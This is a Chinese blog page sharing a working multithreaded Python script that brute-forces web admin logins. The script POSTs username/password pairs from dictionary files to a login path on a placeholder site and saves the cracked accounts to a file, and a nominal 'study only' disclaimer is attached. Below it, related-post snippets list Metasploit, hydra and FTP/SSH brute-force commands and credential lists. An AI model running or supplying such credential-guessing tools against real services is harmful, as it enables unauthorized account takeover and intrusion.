python 写的http后台弱口令爆破工具

# -*- coding: utf-8 -*-
# 利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很# 容易被弱口令爆破工具拿下,(本代码仅限学习实用,禁止进行web攻击,不承担法律责任)
import urllib2
import urllib
import httplib
import threading

headers = {"Content-Type":"application/x-www-form-urlencoded",
           "Connection":"Keep-Alive",
           "Referer":"http://www.xxxxx.com/"};# referer:是代理的访问来源地址
# lock = threading.Lock()
def tryUser(user,password):
    #print user,password
    global headers
    global outFile
    conn = httplib.HTTPConnection("www.xxxxx.com") # 远程域名
    if len(user) < 3:     # 限制用户名长度，排除字典中的无用数据
        return  # 主动退出线程
    else:
        #lock.acquire()   # 多线程操作文件，提前加锁，用后释放
        #line = inFile.readline()

        #userData = line.strip().split(‘ # ‘) # strip() 默认去除空白字符包括‘ ‘,‘\t‘,‘\n‘等
        #lock.release()

        user = user.strip()
        passwd = password.strip()
        params = urllib.urlencode({‘username‘: user, ‘password‘: passwd})
        conn.request(method="POST", url="/users/login", body=params, headers=headers) # 后台路径
        responseText = conn.getresponse().read().decode(‘utf8‘) # 网页编码
        #print responseText  # 第一次可以打印看看是否解析
        if not responseText.find(u‘用户名或者密码不正确,请重新输入!‘) > 0 :
            print ‘----- find user:‘, user, ‘with password:‘, passwd, ‘-----‘
            outFile.write(user + ‘    ‘ +  passwd + ‘\n‘)

    return

outFile = open(‘accounts-cracked.txt‘, ‘w‘)

if __name__ == ‘__main__‘:
    tsk=[] # 创建线程池
    with open(r‘user.dic‘, ‘r‘) as fUser:  # 使用with as 来打开文件,不需自己关闭文件,因为他会自己在合适的时候自已关闭(类似C# 中的using(...){}接口)
        with open(r‘pass.dic‘, ‘r‘) as fPass:
            for user in fUser.readlines():
                for password in fPass.readlines():
                    t= threading.Thread(target = tryUser,args=(user,password))
                    t.daemon = False # 设置不进行进程守护
                    tsk.append(t) # t.start()
                fPass.seek(0)
                # 记住这里要将文件重新移到文件首,不然就会出现只执行外层循环的第一条,因为内层在
                # 迭代之后(readlines()是迭代器的形式,迭代一次后文件指针就指到文件尾了,迭代器
                # 也是end了)第二次就没有password 在 fPass中,也就是说 for  password in fPass.readlines():
                # 为空,所以这里的内层循环就不会被执行了,因此也就是迭代器清零的问题(C ++ itertor 常有)

# join()无参数就是完全阻塞主线程,等待线程执行完 有参数就是说，
# 在主线程等待一秒后就不阻塞线程了,继续执行主线程,这里的意思是一秒钟开一个线程
# 不能再thread start之前调用join(), 因为join() 是线程运行时调度
    for t in tsk:
        t.start()
        t.join(1)

    print "All thread OK,maybe not "
    outFile.close()

时间： 2024-10-08 10:28:00

python 写的http后台弱口令爆破工具的相关文章

python ssh弱口令爆破多线程脚本及遇到的一些错误与问题

练习写了个SSH弱口令爆破多线程脚本,遇到的问题 1.一开始想import pexpect 中的pxssh 然而却一直该有错误, ImportError: cannot import name spawn google了下问题都说的很模糊也不清楚.有的说是pexpect模块没安装好,有的说是python import的问题,因为在lib中已经有了spawn模块,与pexpect模块中的spawn重名了,所以报错.但也都没说清楚该这么弄.最后在here这里看到了问题原因,原来是pexpect根本不

linux安全---系统更新+弱口令检测工具+nmap扫描工具

1.添加yum及更新系统 a.更新设置: echo "0 3 * * 6 yum -y update" >>/var/spool/cron/root b.添加repo源也叫yum源添加国内mirrors,提速: cd /etc/yum.repos.d/ mv ./* /root/ wget http://mirrors.aliyun.com/repo/Centos-6.repo ##下载阿里云yum源 yum makecache ##生成缓存 yum

msf各种弱口令爆破

Msf: 写的很乱记录下msf各个爆破弱口令的模块 run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块检测在线主机 metasploit 增加路由 route add 10.10.1.3 255.255.255.0 1 使用扫描模块 use scanner/portscan/tcp 爆破ssh Msf>use auxiliary/scanner/ssh/ssh_login 爆破ftp Msf>us

Python写的一款印象笔记MarkDown同步工具

神器印象笔记与 Markdown 很久之前就开始记笔记了,印象笔记的笔记同步以及笔记管理一直很赞,所以一直在使用. 最开始的时候是直接用纯文本写笔记. 然后开始使用印象笔记自己的编辑器来添加标题.加粗文本之类的,不得不说这样做很乏味. 后来接触到了神器 MarkDown ,深深了喜欢上了这种简洁优美的标记语言,所有的笔记几乎都是用 MarkDown 来写的. 但是印象笔记的编辑器并不支持 MarkDown 语法,想要在印象笔记上写 MarkDown 笔记,只能借助马克飞象之

theharvester 与 hydra结合爆破邮箱弱口令

theharvester与hydra的结合使用进行邮箱爆破. 首先说一下theharvester是对邮箱进行信息收集的工具. hydra是对弱口令爆破的工具. 爆破流程: 1.找到目标网站,用theharvester对域名进行信息收集,返回的结果是带有邮箱的子域名,然后用awk对子域名处理,只要邮箱的前半部分(因为登录邮箱的时候,它会自动把邮箱格式加上). 2.然后把筛选的数据,当做user字典,然后password字典是自己提供的(可以从网上找,很多,也可以用工具生成). 3.用hydra爆破

Linux的弱口令检测

在internet环境中,过于简单的口令会使服务器面临重要的风险.作为管理人员的我们应及时找出那些密码强度较弱的用户账户,便于进行下一步的安全措施.我们可以安装John the Ripper 软件进行检测用户的密码强度.下面我们来介绍一下如何安装弱口令扫描工具,并作测试.一. 实验前的步骤挂载windows共享出来的文件夹,并对共享的文件夹下的John the Ripper进行安装.被挂载端的步骤如下: 右击被共享的文件,文件中有弱扫描安装包John the Ripper 选择"属性"

使用Burpsuite爆破弱口令教工号

使用Burpsuite爆破弱口令教工号发表于 2015-11-18 | 分类于 Burpsuite | 1条评论 | 26次阅读准备所谓工欲善其事,必先利其器,首先当然是要下载一个Burpsuite,你可以baidu,google找一个破解版的,当然也可以用kali系统自带的,不过kali系统自带的会有线程限制,只允许单线程,所以还是去找个破解版的吧!需要特别注意的是Burpsuite是用java编写的,所以学要java运行环境,正如sqlmap需要python运行环境

FTP弱口令猜解【python脚本】

ftp弱口令猜解 python脚本: #! /usr/bin/env python # _*_ coding:utf-8 _*_ import ftplib,time username_list=['root','ftp','admin'] password_list=['root','123','ftp','oracle'] def ftp(ip,port=21): for username in username_list: user =username.rstrip() for passw

python写游戏运维管理后台

最近在用python写游戏运维管理的后台,待功能完善后放源码,大致功能如下: 有兴趣的可以加我一起来做.